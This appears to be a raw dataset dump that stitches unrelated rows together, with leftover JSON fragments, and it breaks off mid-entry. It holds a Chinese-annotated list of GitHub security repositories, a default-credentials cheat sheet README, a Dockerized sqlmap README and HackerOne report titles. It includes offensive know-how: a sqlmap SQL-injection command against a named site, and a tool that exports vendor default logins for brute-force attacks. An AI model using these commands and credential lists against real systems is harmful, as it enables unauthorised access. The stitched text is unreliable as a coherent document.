infrastructure hardening resources\n- [**2146**星][13d] [Ruby] [mojombo/god](https://github.com/mojombo/god) Ruby进程监控\n- [**2145**星][11d] [C] [fragglet/c-algorithms](https://github.com/fragglet/c-algorithms) A library of common data structures and algorithms written in C.\n- [**2144**星][3m] [Rust] [indygreg/pyoxidizer](https://github.com/indygreg/pyoxidizer) A modern Python application packaging and distribution tool\n- [**2143**星][1y] [TS] [loiane/javascript-datastructures-algorithms](https://github.com/loiane/javascript-datastructures-algorithms) \n- [**2142**星][10d] [C++] [xoseperez/espurna](https://github.com/xoseperez/espurna) 基于esp8266设备的家庭自动化固件\n- [**2138**星][11d] [Py] [dlitz/pycrypto](https://github.com/dlitz/pycrypto) Python密码工具箱\n- [**2136**星][10d] [Py] [thekingofduck/fuzzdicts](https://github.com/thekingofduck/fuzzdicts) Web渗透Fuzz字典\n- [**2133**星][10d] [C++] [pytorch/glow](https://github.com/pytorch/glow) 编译器的神经网络硬件加速器\n- [**2132**星][10d] [Go] [mosn/mosn](https://github.com/mosn/mosn) MOSN is a cloud native proxy for edge or service mesh.\n- [**2132**星][6m] [C++] [darthton/blackbone](https://github.com/darthton/blackbone) Windows内存Hacking库\n- [**2131**星][4m] [C] [wireguard/wireguard-monolithic-historical](https://github.com/WireGuard/wireguard-monolithic-historical) 快速,现代,安全内核VPN隧道\n- [**2129**星][6m] [Swift] [krzysztofzablocki/lifetimetracker](https://github.com/krzysztofzablocki/lifetimetracker) :尽早发现保留周期/内存泄漏。\n- [**2129**星][10d] [Go] [google/trillian](https://github.com/google/trillian) :一个透明的、高度可伸缩的、可以通过密码验证的数据存储。\n- [**2128**星][11d] [Py] [nixawk/pentest-wiki](https://github.com/nixawk/pentest-wiki) PENTEST-WIKI is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others.\n- [**2128**星][2m] [Go] [mpolden/echoip](https://github.com/mpolden/echoip) IP地址查询服务\n- [**2126**星][3m] [Java] [jeremylong/dependencycheck](https://github.com/jeremylong/dependencycheck) 软件组件分析实用程序,用于检测应用程序依赖项中公开披露的漏洞\n- [**2124**星][10d] [Py] [momosecurity/aswan](https://github.com/momosecurity/aswan) 陌陌风控系统静态规则引擎,零基础简易便捷的配置多种复杂规则,实时高效管控用户异常行为。\n- [**2117**星][10d] [C] [darkk/redsocks](https://github.com/darkk/redsocks) 使用防火墙将任何TCP连接重定向到SOCKS或HTTPS代理,因此重定向可以是系统范围的或网络范围的。\n- [**2116**星][12d] [Java] [tdebatty/java-string-similarity](https://github.com/tdebatty/java-string-similarity) Implementation of various string similarity and distance algorithms: Levenshtein, Jaro-winkler, n-Gram, Q-Gram, Jaccard index, Longest Common Subsequence edit distance, cosine similarity ...\n- [**2116**星][10d] [Go] [gdamore/tcell](https://github.com/gdamore/tcell) 另一个终端包,在某些方面类似于termbox,但在其他方面更好。\n- [**2115**星][11d] [YARA] [yara-rules/rules](https://github.com/yara-rules/rules) Repository of yara rules\n- [**2113**星][11d] [obfuscator-llvm/obfuscator](https://github.com/obfuscator-llvm/obfuscator) Obfuscator-LLVM \n- [**2112**星][4m] [tanprathan/mobileapp-pentest-cheatsheet](https://github.com/tanprathan/mobileapp-pentest-cheatsheet) The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics.\n- [**2112**星][10d] [Go] [bitnami-labs/sealed-secrets](https://github.com/bitnami-labs/sealed-secrets) 一种用于单向加密秘密的Kubernetes控制器和工具\n- [**2111**星][7d] [Go] [maxmcd/webtty](https://github.com/maxmcd/webtty) 通过WebRTC共享一个终端会话\n- [**2109**星][10d] [C] [ralim/ts100](https://github.com/ralim/ts100) 该特性通过miniware打包了TS100 iron的备用开源固件。\n- [**2108**星][4m] [Go] [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder) 使用Passive Sources, Search Engines, Pastebins, Internet Archives等查找子域名\n
\n 查看详情\n\n\n ## Misc\n - 纯被动\n - stdin/stdout,集成到工作流\n \n ## 安装\n - `go get -v github.com/projectdiscovery/subfinder/cmd/subfinder`\n - `go get -u -v github.com/projectdiscovery/subfinder/cmd/subfinder` : 更新\n
\n\n\n- [**2107**星][9d] [TS] [microsoft/vscode-react-native](https://github.com/microsoft/vscode-react-native) VSCode extension for React Native - supports debugging and editor integration\n- [**2106**星][10d] [C] [tinyproxy/tinyproxy](https://github.com/tinyproxy/tinyproxy) OSIX操作系统的轻量级HTTP/HTTPS代理守护进程\n- [**2103**星][4m] [Py] [welliamcao/opsmanage](https://github.com/welliamcao/opsmanage) 自动化运维平台: 代码及应用部署CI/CD、资产管理CMDB、计划任务管理平台、SQL审核|回滚、任务调度、站内WIKI\n- [**2103**星][11d] [Py] [cea-sec/miasm](https://github.com/cea-sec/miasm) Python中的逆向工程框架\n- [**2102**星][10d] [C] [hashcat/hashcat-legacy](https://github.com/hashcat/hashcat-legacy) 先进的基于cpu的密码恢复实用程序\n- [**2100**星][10d] [Py] [hunters-forge/threathunter-playbook](https://github.com/hunters-forge/ThreatHunter-Playbook) A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.\n- [**2091**星][11d] [Java] [jindrapetrik/jpexs-decompiler](https://github.com/jindrapetrik/jpexs-decompiler) Flash反编译器\n- [**2091**星][4m] [Py] [j3ssie/osmedeus](https://github.com/j3ssie/osmedeus) 完全自动化的攻击安全框架的侦察和漏洞扫描\n- [**2090**星][5m] [C] [dekunukem/nintendo_switch_reverse_engineering](https://github.com/dekunukem/nintendo_switch_reverse_engineering) 看看Joycon和任天堂Switch的内部工作原理\n- [**2086**星][5m] [infosecn1nja/ad-attack-defense](https://github.com/infosecn1nja/ad-attack-defense) (文档)活动目录的攻击和防御,使用现代后渗透的谍报活动\n- [**2085**星][10d] [C] [ntop/ndpi](https://github.com/ntop/ndpi) 开源深包检测软件工具包\n- [**2083**星][10d] [Go] [ffuf/ffuf](https://github.com/ffuf/ffuf) 用Go编写的快速web fuzzer\n- [**2081**星][2y] [BitBake] [1n3/intruderpayloads](https://github.com/1n3/intruderpayloads) BurpSuite Intruder Payload收集\n- [**2078**星][12d] [toolswatch/blackhat-arsenal-tools](https://github.com/toolswatch/blackhat-arsenal-tools) Black Hat 武器库\n- [**2065**星][2y] [Py] [derv82/wifite](https://github.com/derv82/wifite) 自动化无线攻击工具\n- [**2064**星][4m] [C#] [lucasg/dependencies](https://github.com/lucasg/dependencies) :重写旧的遗留软件“depends.exe\"在c#中为Windows开发人员解决dll加载依赖问题\n- [**2060**星][10d] [C++] [wrbug/dumpdex](https://github.com/wrbug/dumpdex) Android脱壳\n- [**2058**星][11d] [C++] [powerdns/pdns](https://github.com/powerdns/pdns) owerDNS授权服务器和dnsdist(功能强大的DNS负载平衡器)的源码\n- [**2057**星][9d] [C] [minhaskamal/creepycodecollection](https://github.com/minhaskamal/creepycodecollection) A Nonsense Collection of Disgusting Codes (quine-polyglot-code-golf-obfuscated-signature-creepy-codes-mandelbrot-esoteric-language-esoteric-programming-strange-golfing-spooky-weird)\n- [**2052**星][4m] [C++] [mhammond/pywin32](https://github.com/mhammond/pywin32) Python for Windows (pywin32)扩展\n- [**2049**星][10d] [Py] [scrapy/scrapyd](https://github.com/scrapy/scrapyd) 一个运行scrapy的服务守护进程\n- [**2049**星][10m] [HTML] [nikolait/googlescraper](https://github.com/nikolait/googlescraper) 一个Python模块来抓取几个搜索引擎(比如谷歌,Yandex, Bing, Duckduckgo,…)包括异步联网支持。\n- [**2048**星][12d] [Go] [floyernick/data-structures-and-algorithms](https://github.com/floyernick/data-structures-and-algorithms) Data Structures and Algorithms implementation in Go\n- [**2048**星][10d] [dloss/python-pentest-tools](https://github.com/dloss/python-pentest-tools) 可用于渗透测试的Python工具收集\n- [**2047**星][12d] [C] [xoreaxeaxeax/rosenbridge](https://github.com/xoreaxeaxeax/rosenbridge) 某些x86 cpu中的硬件后门\n- [**2047**星][4m] [Jupyter Notebook] [cyb3rward0g/helk](https://github.com/cyb3rward0g/helk) 对ELK栈进行分析,具备多种高级功能,例如SQL声明性语言,图形,结构化流,机器学习等\n- [**2045**星][11d] [Java] [adoptopenjdk/jitwatch](https://github.com/adoptopenjdk/jitwatch) 用于Java HotSpot JIT编译器的日志分析器/可视化器。检查内联决策、热方法、字节码和程序集。在JavaFX用户界面中查看结果。\n- [**2039**星][4m] [Go] [xiaoming2028/freepac](https://github.com/xiaoming2028/freepac) 科学上网/梯子/自由上网/翻墙 SS/SSR/V2Ray/Brook 搭建教程\n- [**2038**星][11d] [jadagates/shadowsocksbio](https://github.com/jadagates/shadowsocksbio) 记录一下SS的前世今生,以及一个简单的教程总结\n- [**2036**星][13d] [Go] [skynetservices/skydns](https://github.com/skynetservices/skydns) DNS service discovery for etcd\n- [**2032**星][10d] [Lua] [vulnerscom/nmap-vulners](https://github.com/vulnerscom/nmap-vulners) 基于Vulners.com API的NSE脚本\n- [**2032**星][3y] [Swift] [urinx/iosapphook](https://github.com/urinx/iosapphook) 专注于非越狱环境下iOS应用逆向研究,从dylib注入,应用重签名到App Hook\n- [**2029**星][5y] [CoffeeScript] [shadowsocks/shadowsocks-gui](https://github.com/shadowsocks/shadowsocks-gui) Shadowsocks GUI client\n- [**2028**星][10d] [JS] [ghacksuserjs/ghacks-user.js](https://github.com/ghacksuserjs/ghacks-user.js) 一个持续进行的综合user.js模板,用于配置和强化Firefox的隐私,安全性和防指纹识别功能\n- [**2024**星][11d] [PHP] [symfony/panther](https://github.com/symfony/panther) A browser testing and web crawling library for PHP and Symfony\n- [**2023**星][4m] [C] [adaway/adaway](https://github.com/adaway/adaway) AdAway is an open source ad blocker for Android using the hosts file.\n- [**2022**星][6m] [Swift] [github/softu2f](https://github.com/github/softu2f) macOS的U2F认证软件\n- [**2021**星][3m] [Perl] [spiderlabs/owasp-modsecurity-crs](https://github.com/spiderlabs/owasp-modsecurity-crs) 一套用于ModSecurity或兼容的web应用程序防火墙的通用攻击检测规则\n- [**2021**星][10d] [C] [kevinoconnor/klipper](https://github.com/kevinoconnor/klipper) 一个3d打印机固件\n- [**2019**星][10d] [C] [chipsec/chipsec](https://github.com/chipsec/chipsec) 分析PC平台的安全性, 包括硬件、系统固件(BIOS/UEFI)和平台组件\n- [**2018**星][7d] [PHP] [jae-jae/querylist](https://github.com/jae-jae/querylist) \n- [**2016**星][10d] [Go] [yahoo/gryffin](https://github.com/yahoo/gryffin) 一个大规模的网络安全扫描平台\n- [**2016**星][11d] [C] [mgba-emu/mgba](https://github.com/mgba-emu/mgba) mGBA Game Boy高级仿真器\n- [**2015**星][10d] [TS] [snyk/snyk](https://github.com/snyk/snyk) 查找并修复开源软件依赖项中的已知漏洞\n- [**2014**星][10d] [Py] [minimaxir/facebook-page-post-scraper](https://github.com/minimaxir/facebook-page-post-scraper) 数据爬取的Facebook页面,以及附带的代码博客文章如何从Facebook页面文章抓取数据进行统计分析\n- [**2011**星][4m] [JS] [thealgorithms/javascript](https://github.com/thealgorithms/javascript) 用于Javascript实现的所有算法\n- [**2006**星][10d] [Go] [minishift/minishift](https://github.com/minishift/minishift) 一个通过在VM中运行单节点OpenShift集群来帮助您在本地运行OpenShift的工具。\n- [**2004**星][8d] [Py] [gerapy/gerapy](https://github.com/gerapy/gerapy) Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Django and Vue.js\n- [**2004**星][10d] [C] [probablycorey/wax](https://github.com/probablycorey/wax) Wax is now being maintained by alibaba\n- [**2003**星][6m] [olivierlaflamme/cheatsheet-god](https://github.com/olivierlaflamme/cheatsheet-god) Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet\n- [**2002**星][10d] [ngalongc/bug-bounty-reference](https://github.com/ngalongc/bug-bounty-reference) Inspired by\n- [**2002**星][3m] [Java] [kyson/androidgodeye](https://github.com/kyson/androidgodeye) 一个性能监测工具,如Android的“Android Studio profiler”,你可以很容易地监测你的应用程序的性能实时在pc浏览器\n- [**1994**星][5m] [C++] [acidanthera/lilu](https://github.com/acidanthera/Lilu) 在macOS上任意kext和进程补丁\n- [**1992**星][10d] [coreb1t/awesome-pentest-cheat-sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) Collection of the cheat sheets useful for pentesting\n- [**1990**星][10d] [Java] [tiann/epic](https://github.com/tiann/epic) 动态java方法AOP钩子用于Android(Dexposed on ART的延续),支持4.0~10.0\n- [**1988**星][10d] [Py] [lanbing510/doubanspider](https://github.com/lanbing510/doubanspider) 豆瓣读书的爬虫\n- [**1987**星][3m] [Go] [zalando/skipper](https://github.com/zalando/skipper) 进行服务整合的HPPT路由器和反向代理\n- [**1987**星][12m] [Java] [fuzion24/justtrustme](https://github.com/fuzion24/justtrustme) An xposed module that disables SSL certificate checking for the purposes of auditing an app with cert pinning\n- [**1987**星][11d] [C] [cesanta/mongoose-os](https://github.com/cesanta/mongoose-os) 物联网固件开发框架\n- [**1985**星][2y] [Py] [dormymo/spiderkeeper](https://github.com/dormymo/spiderkeeper) 为scrapy/开源scrapinghub管理ui\n- [**1983**星][11d] [C++] [tum-vision/lsd_slam](https://github.com/tum-vision/lsd_slam) 一种实时监控SLAM的新方法。\n- [**1979**星][10d] [17mon/china_ip_list](https://github.com/17mon/china_ip_list) IPList for China by IPIP.NET\n- [**1976**星][5y] [Py] [ziggear/shadowsocks](https://github.com/ziggear/shadowsocks) backup of https://github.com/shadowsocks/shadowsocks\n- [**1976**星][6m] [Py] [lanjelot/patator](https://github.com/lanjelot/patator) 一个多用途的爆破工具,具有模块化的设计和灵活的使用\n- [**1975**星][10d] [JS] [robinmoisson/staticrypt](https://github.com/robinmoisson/staticrypt) Password protect a static HTML page\n- [**1975**星][10d] [Py] [gaojiuli/gain](https://github.com/gaojiuli/gain) 基于asyncio的Web爬虫框架\n- [**1974**星][5m] [C] [microsoft/procdump-for-linux](https://github.com/microsoft/procdump-for-linux) Linux 版本的 ProcDump\n- [**1971**星][10d] [PS] [fireeye/flare-vm](https://github.com/fireeye/flare-vm) 火眼发布用于 Windows 恶意代码分析的虚拟机:FLARE VM\n- [**1969**星][10d] [rmerl/asuswrt-merlin.ng](https://github.com/rmerl/asuswrt-merlin.ng) 华硕路由器的第三方固件(更新的代码库)\n- [**1967**星][3y] [C#] [lazocoder/windows-hacks](https://github.com/lazocoder/windows-hacks) 创造性和不寻常的事情,可以做与Windows API。\n- [**1966**星][11d] [Go] [hyperhq/hyperd](https://github.com/hyperhq/hyperd) HyperContainer Daemon\n- [**1963**星][10d] [Py] [lijiejie/subdomainsbrute](https://github.com/lijiejie/subdomainsbrute) 子域名爆破\n- [**1963**星][10d] [Shell] [leebaird/discover](https://github.com/leebaird/discover) 自定义的bash脚本, 用于自动化多个渗透测试任务, 包括: 侦查、扫描、解析、在Metasploit中创建恶意Payload和Listener\n- [**1960**星][10d] [JS] [weichiachang/stacks-cli](https://github.com/weichiachang/stacks-cli) 从终端检查网站堆栈\n- [**1960**星][10d] [Py] [anorov/cloudflare-scrape](https://github.com/anorov/cloudflare-scrape) 一个绕过Cloudflare反机器人页面的Python模块。\n- [**1959**星][10d] [Py] [jinnlynn/genpac](https://github.com/jinnlynn/genpac) 基于gfwlist的多种代理软件配置文件生成工具,支持自定义规则,目前可生成的格式有pac, dnsmasq, wingy。\n- [**1956**星][13d] [JS] [diafygi/gethttpsforfree](https://github.com/diafygi/gethttpsforfree) 获得一个免费的HTTPS证书,而无需安装任何软件或与任何人共享您的私钥\n- [**1955**星][1y] [C++] [facebookresearch/elf](https://github.com/facebookresearch/elf) An End-To-End, Lightweight and Flexible Platform for Game Research\n- [**1954**星][10d] [Py] [python-security/pyt](https://github.com/python-security/pyt) Python Web App 安全漏洞检测和静态分析工具\n- [**1953**星][11d] [C++] [iagox86/dnscat2](https://github.com/iagox86/dnscat2) 在 DNS 协议上创建加密的 C&C channel\n- [**1953**星][13d] [C++] [googlecreativelab/open-nsynth-super](https://github.com/googlecreativelab/open-nsynth-super) NSynth算法的实验物理接口\n- [**1941**星][10d] [Py] [pwnlandia/mhn](https://github.com/pwnlandia/mhn) 一个用于管理和收集蜜罐数据的集中式服务器\n- [**1940**星][11d] [TS] [rangle/augury](https://github.com/rangle/augury) Angular调试和可视化工具\n- [**1937**星][10d] [Py] [trailofbits/manticore](https://github.com/trailofbits/manticore) 动态二进制分析工具,支持符号执行(symbolic execution)、污点分析(taint analysis)、运行时修改。\n- [**1937**星][2y] [Py] [aploium/zmirror](https://github.com/aploium/zmirror) 一个Python反向HTTP代理程序, 用于快速、简单地创建别的网站的镜像, 自带本地文件缓存、CDN支持\n- [**1933**星][10d] [C] [ntop/n2n](https://github.com/ntop/n2n) 一个轻VPN软件,使它很容易创建绕过中间防火墙的虚拟网络\n- [**1931**星][12d] [C] [retroplasma/earth-reverse-engineering](https://github.com/retroplasma/earth-reverse-engineering) 逆向谷歌的3D卫星模式\n- [**1930**星][11d] [Py] [lorien/grab](https://github.com/lorien/grab) Web抓取框架\n- [**1928**星][10d] [onethawt/idaplugins-list](https://github.com/onethawt/idaplugins-list) IDA插件收集\n- [**1927**星][12d] [JS] [coreybutler/node-windows](https://github.com/coreybutler/node-windows) Windows support for Node.JS scripts (daemons, eventlog, UAC, etc).\n"}}},{"rowIdx":541,"cells":{"text":{"kind":"string","value":"\n# Default Credentials Cheat Sheet\n\n

\n \n

\n\n**One place for all the default credentials to assist pentesters during an engagement, this document has several products default login/password gathered from multiple sources.**\n\n> P.S : Most of the credentials were extracted from changeme,routersploit and Seclists projects, you can use these tools to automate the process https://github.com/ztgrace/changeme , https://github.com/threat9/routersploit (kudos for the awesome work)\n\n- [x] Project in progress\n\n## Motivation\n- One document for the most known vendors default credentials\n- Assist pentesters during a pentest/red teaming engagement\n- **Helping the Blue teamers to secure the company infrastructure assets by discovering this security flaw in order to mitigate it**. See \n[OWASP Guide [WSTG-ATHN-02] - Testing_for_Default_Credentials](https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials \"OWASP Guide\")\n\n\n#### Short stats of the dataset\n\n| | Product/Vendor |\tUsername | Password |\n| --- | --- | --- | --- |\n| **count**\t| 3522\t| 3522\t| 3522 |\n| **unique** |\t1235\t| 1099 |\t1631 |\n| **top** |\tOracle| | |\n| **freq** |\t235 |\t725 |\t461 |\n\n#### Sources\n\n- [Changeme](https://github.com/ztgrace/changeme \"Changeme project\")\n- [Routersploit]( https://github.com/threat9/routersploit \"Routersploit project\")\n- [betterdefaultpasslist]( https://github.com/govolution/betterdefaultpasslist \"betterdefaultpasslist\")\n- [Seclists]( https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials \"Seclist project\")\n- [ics-default-passwords](https://github.com/arnaudsoullie/ics-default-passwords) (thanks to @noraj)\n- Vendors documentations/blogs\n\n## Installation & Usage\n\nThe Default Credentials Cheat Sheet tool is available on [pypi](https://pypi.org/project/defaultcreds-cheat-sheet/)\n\n```bash\n$ pip3 install defaultcreds-cheat-sheet\n$ creds search tomcat\n```\nTested on:\n* Kali linux\n* Ubuntu\n* Lubuntu\n\n##### Manual Installation\n\n```bash\n$ git clone https://github.com/ihebski/DefaultCreds-cheat-sheet\n$ pip3 install -r requirements.txt\n$ cp creds /usr/bin/ && chmod +x /usr/bin/creds\n$ creds search tomcat\n```\n\n#### Creds script\n\n* Usage Guide\n```bash\n# Search for product creds\n➤ creds search tomcat \n+----------------------------------+------------+------------+\n| Product | username | password |\n+----------------------------------+------------+------------+\n| apache tomcat (web) | tomcat | tomcat |\n| apache tomcat (web) | admin | admin |\n...\n+----------------------------------+------------+------------+\n\n# Update records\n➤ creds update\nCheck for new updates...🔍\nNew updates are available 🚧\n[+] Download database...\n\n# Export Creds to files (could be used for brute force attacks)\n➤ creds search tomcat export\n+----------------------------------+------------+------------+\n| Product | username | password |\n+----------------------------------+------------+------------+\n| apache tomcat (web) | tomcat | tomcat |\n| apache tomcat (web) | admin | admin |\n...\n+----------------------------------+------------+------------+\n\n[+] Creds saved to /tmp/tomcat-usernames.txt , /tmp/tomcat-passwords.txt 📥\n```\n \n[![asciicast](https://asciinema.org/a/526599.svg)](https://asciinema.org/a/526599)\n \n#### Pass Station\n\n[noraj][noraj] created CLI & library to search for default credentials among this database using `DefaultCreds-Cheat-Sheet.csv`.\nThe tool is named [Pass Station][pass-station] ([Doc][ps-doc]) and has some powerful search feature (fields, switches, regexp, highlight) and output (simple table, pretty table, JSON, YAML, CSV).\n\n[![asciicast](https://asciinema.org/a/397713.svg)](https://asciinema.org/a/397713)\n\n[noraj]:https://pwn.by/noraj/\n[pass-station]:https://github.com/sec-it/pass-station\n[ps-doc]:https://sec-it.github.io/pass-station/\n\n## Contribute\n\nIf you cannot find the password for a specific product, please submit a pull request to update the dataset.
\n\n> ### Disclaimer\n> **For educational purposes only, use it at your own responsibility.** \n"}}},{"rowIdx":542,"cells":{"text":{"kind":"string","value":"# k0st/alpine-sqlmap-git\n\nDockerized sqlmap from github (git)\n\nImage is based on the [gliderlabs/alpine](https://registry.hub.docker.com/u/gliderlabs/alpine/) base image\n\n## Docker image size\n\n[![Latest](https://badge.imagelayers.io/k0st/alpine-sqlmap-git.svg)](https://imagelayers.io/?images=k0st/alpine-sqlmap-git:latest 'latest')\n\n## Docker image usage\n\n```\ndocker run --rm -it k0st/alpine-sqlmap-git -u http://vuln.site.com/i?=1 -p i\n```\n\n## Examples\n\nRun scan on https://www.example.org:\n\n```\ndocker run --rm -it k0st/alpine-sqlmap-git -u http://vuln.site.com/i?=1 -p i\n```\n\n### Todo\n- [ ] Check volume and data\n\n"}}},{"rowIdx":543,"cells":{"text":{"kind":"string","value":"### Title\nПолучение предложенных фотографий паблику \n#### URL \nhttps://hackerone.com/reports/227781\n#### Severity score\nnull\n#### Reporter \npisarenko\n### Bounty paid\n$200\n\n\n---\n\n\n### Title\nSession Cookie Without Secure Flag,\n#### URL \nhttps://hackerone.com/reports/343095\n#### Severity score\nnull\n#### Reporter \ntangent90ninety\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nMissing resource identifier encoding may lead to security vulnerabilities\n#### URL \nhttps://hackerone.com/reports/803922\n#### Severity score\n4.8\n#### Reporter \njobert\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFiles Drop: WebDAV endpoint is leaking existence of resources\n#### URL \nhttps://hackerone.com/reports/187460\n#### Severity score\n3.7\n#### Reporter \nlukasreschke\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\n[health.mail.ru] Раскрытие SSI сценариев\n#### URL \nhttps://hackerone.com/reports/283492\n#### Severity score\n0\n#### Reporter \nbobrov\n### Bounty paid\n$150\n\n\n---\n\n\n### Title\nDevelopper's websites are easily accessibles leading to massive information disclosure\n#### URL \nhttps://hackerone.com/reports/643882\n#### Severity score\nnull\n#### Reporter \nsicarius\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nfile full path discloser.\n#### URL \nhttps://hackerone.com/reports/116057\n#### Severity score\nnull\n#### Reporter \nacc_122\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nСпособ узнать имя человека удаленной страницы\n#### URL \nhttps://hackerone.com/reports/193419\n#### Severity score\nnull\n#### Reporter \npisarenko\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nCMS Information Disclosure\n#### URL \nhttps://hackerone.com/reports/17297\n#### Severity score\nnull\n#### Reporter \ngangw4n\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAapp name leakage on economy history page\n#### URL \nhttps://hackerone.com/reports/349681\n#### Severity score\n5\n#### Reporter \nxpaw\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nBoards leak private label names and desciptions\n#### URL \nhttps://hackerone.com/reports/162147\n#### Severity score\nnull\n#### Reporter \njobert\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nNginx version disclosure via response header\n#### URL \nhttps://hackerone.com/reports/183245\n#### Severity score\nnull\n#### Reporter \njapz\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nFile name and folder enumeration.\n#### URL \nhttps://hackerone.com/reports/118688\n#### Severity score\nnull\n#### Reporter \nderision\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nPHPInfo Page on www.razer.ru\n#### URL \nhttps://hackerone.com/reports/744573\n#### Severity score\nnull\n#### Reporter \nl00ph0le\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nUninitialized read in exif_process_IFD_in_MAKERNOTE\n#### URL \nhttps://hackerone.com/reports/516237\n#### Severity score\n7.5\n#### Reporter \nchamal\n### Bounty paid\n$1,500\n\n\n---\n\n\n### Title\nGain access to random information via group chat \"about\" property\n#### URL \nhttps://hackerone.com/reports/254285\n#### Severity score\n5.9\n#### Reporter \n3c75\n### Bounty paid\n$1,000\n\n\n---\n\n\n### Title\nOracle WebCenter Sites Support Tools available and Information disclosure (/cs/Satellite)\n#### URL \nhttps://hackerone.com/reports/164581\n#### Severity score\nnull\n#### Reporter \nrpinuaga\n### Bounty paid\n$100\n\n\n---\n\n\n### Title\nFlash Player information disclosure (etc.) CVE-2015-3044, PSIRT-3298\n#### URL \nhttps://hackerone.com/reports/63324\n#### Severity score\nnull\n#### Reporter \njouko\n### Bounty paid\n$2,000\n\n\n---\n\n\n### Title\nSensitive data leaks [username, password, keys]\n#### URL \nhttps://hackerone.com/reports/961170\n#### Severity score\nnull\n#### Reporter \nanjpan\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nAPI method at api.my.games allows to enumerate user emails\n#### URL \nhttps://hackerone.com/reports/758401\n#### Severity score\nnull\n#### Reporter \nmobius07\n### Bounty paid\n$400\n\n\n---\n\n\n### Title\nInternal Ports Scanning via Blind SSRF\n#### URL \nhttps://hackerone.com/reports/263169\n#### Severity score\nnull\n#### Reporter \ntungpun\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSeemingly sensitive information at /api/v2/zones\n#### URL \nhttps://hackerone.com/reports/165131\n#### Severity score\nnull\n#### Reporter \nsameoldstory\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nWordPress Vulnerabilities: User Enumeration, Vulnerable Akismet Plugin, XML-RPC Interface available\n#### URL \nhttps://hackerone.com/reports/146093\n#### Severity score\nnull\n#### Reporter \nvivek-p\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nShared file link - password protection bypass under certain conditions\n#### URL \nhttps://hackerone.com/reports/231917\n#### Severity score\nnull\n#### Reporter \nicewater\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nTalk / spreed: Disclosure of Room names and participants for password protected rooms\n#### URL \nhttps://hackerone.com/reports/428010\n#### Severity score\nnull\n#### Reporter \nfoobar7\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nInformation disclosure at lite.uber.com\n#### URL \nhttps://hackerone.com/reports/128853\n#### Severity score\nnull\n#### Reporter \nkusl\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInformation disclosure vulnerability on a DoD website\n#### URL \nhttps://hackerone.com/reports/184558\n#### Severity score\nnull\n#### Reporter \n0x01alka\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nActiveStorage service's signed URLs can be hijacked via AppCache+Cookie stuffing trick when using GCS or DiskService\n#### URL \nhttps://hackerone.com/reports/407319\n#### Severity score\n7.4\n#### Reporter \nrosa\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPHPinfo page on http://█████.callstats.io\n#### URL \nhttps://hackerone.com/reports/907701\n#### Severity score\nnull\n#### Reporter \nmanantch\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nPersonal information disclosure on a DoD website\n#### URL \nhttps://hackerone.com/reports/188149\n#### Severity score\nnull\n#### Reporter \nspam404\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\ndon't leak Server version for assets.gratipay.com\n#### URL \nhttps://hackerone.com/reports/151302\n#### Severity score\nnull\n#### Reporter \nahsan\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nOpen aws s3 bucket s3://rubyci\n#### URL \nhttps://hackerone.com/reports/257276\n#### Severity score\nnull\n#### Reporter \nsandeep_hodkasia\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nInternal IP Address Disclosure at https://www.lahitapiolarahoitus.fi/wp-json/wp/v2/pages\n#### URL \nhttps://hackerone.com/reports/329791\n#### Severity score\nnull\n#### Reporter \nsmokescreen\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nForum Users Information Disclosure\n#### URL \nhttps://hackerone.com/reports/321249\n#### Severity score\nnull\n#### Reporter \nfahimeh\n### Bounty paid\n$300\n\n\n---\n\n\n### Title\nEmail enumeration\n#### URL \nhttps://hackerone.com/reports/2766\n#### Severity score\nnull\n#### Reporter \nanshuman_bh\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nMisconfigured web directory allows to retrieve public proxy list\n#### URL \nhttps://hackerone.com/reports/791826\n#### Severity score\nnull\n#### Reporter \n3viltwin\n### Bounty paid\n$50\n\n\n---\n\n\n### Title\nWordpress directories/files visible to internet\n#### URL \nhttps://hackerone.com/reports/201984\n#### Severity score\nnull\n#### Reporter \ntk0\n### Bounty paid\n$600\n\n\n---\n\n\n### Title\n16 instances where return value of OpenSSL i2d_RSAPublicKey is discarded -- might lead to use of uninitialized memory\n#### URL \nhttps://hackerone.com/reports/142773\n#### Severity score\nnull\n#### Reporter \nguido\n### Bounty paid\n$200\n\n\n---\n\n\n### Title\nProgram Email Nofication settings ignored when being added as an external contributor\n#### URL \nhttps://hackerone.com/reports/645264\n#### Severity score\n3.4\n#### Reporter \nthe_arch_angel\n### Bounty paid\n$500\n\n\n---\n\n\n### Title\nApache version disclosure\n#### URL \nhttps://hackerone.com/reports/139547\n#### Severity score\nnull\n#### Reporter \nignatius\n### Bounty paid\nnull\n\n\n---\n\n\n### Title\nSql query disclosure,\n#### URL 